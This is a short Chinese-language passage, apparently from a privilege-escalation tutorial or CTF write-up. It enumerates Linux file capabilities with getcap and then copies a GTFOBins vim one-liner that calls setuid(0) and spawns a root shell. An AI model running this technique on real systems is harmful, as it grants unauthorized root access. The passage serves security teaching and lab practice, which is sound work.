所以尝试这个提权思路时,先用命令查看哪些程序有该属性:
getcap -r / 2>/dev/null 该命令运行后效果如下图:
可以看到vim可以设置uid,那就和GTFObins 网站联动,去查找vim相关的,复制粘贴Capabilities部分的命令:
./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'如果上述不能用,尝试py写成py3,也就是根据系统python版本决定,若成功,会得到root的shell:
